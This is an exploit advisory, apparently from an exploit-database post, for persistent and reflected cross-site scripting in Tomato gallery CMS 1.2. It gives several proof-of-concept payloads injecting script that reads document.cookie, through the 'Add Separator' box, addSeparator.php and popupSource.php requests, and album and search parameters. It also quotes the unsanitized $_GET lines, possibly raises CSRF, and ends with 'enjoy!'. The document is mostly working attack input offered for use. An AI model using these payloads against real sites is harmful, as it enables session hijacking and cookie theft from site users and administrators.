Kod:# exploit title: persistant xss in cms tomato 1.2 (logged only) # date: 8.o2.2o11 # author: lemlajt # software link: http://tomatogallery.yzx.se/ # version: 1.2 # tested on: linux # cve : # poc0.1 : 1. http://localhost/www/cmsadmins/tomato_gallery_1_2/edit/index.php 2. click @ "Add Separator" and type: bla'';!--<script>alert(document.cookie)</script>=&{()} in the box 3. persistant. try: POST http://localhost/www/cmsadmins/tomato_gallery_1_2/ajaxinfo/addSeparator.php ?separatorName=bla'';!--<script>alert(document.cookie)</script>=&{()} HTTP/1.1 more: cat -n $tomato_dir/ajaxinfo/addSeparator.php --- <ut ------ <ut ------ <ut ------ <ut --- 11 $albumName = $_GET["separatorName"]; --- <ut ------ <ut ------ <ut ------ <ut --- ... and more, enjoy! o/ # * csrf? poc0.2 : POST http://localhost/www/cmsadmins/tomato_gallery_1_2/ajaxinfo/popupSource.php?popup=create-album&album=undefined HTTP/1.1 ;] in second line of ajaxinfo/popupSource.php we see: $popup = $_GET['popup']; replace 'create-album' to: ''script in source of generated page find your alert: <li id="item_0" style="margin:0; padding:0; list-style:none;" lang="test;!--<script>alert(document.cookie)</script>="> <div class="group" onMouseOver="hoverAlbum('in','1')" onMouseOut="hoverAlbum('out','1')" id="album1"> <div class="stripe"></div> <div class="albumText" style="position:absolute;" id="albumText1" onclick="this.innerHTML = this.lang" lang="test';!--<script>alert(document.cookie)</script>=">test';!--<script>alert(document.cookie)</script>= </div> # file inputs? poc0.3 : some error when typing: http://localhost/www/cmsadmins/tomato_gallery_1_2/edit/index.php?album=%27%27;!--%3Cscript%3Ealert%28document.cookie%29%3C/script%3E=&{%28%29}# poc0.4 : xss via GET $search = '';!--<script>alert(document.cookie)</script>=&{()} regards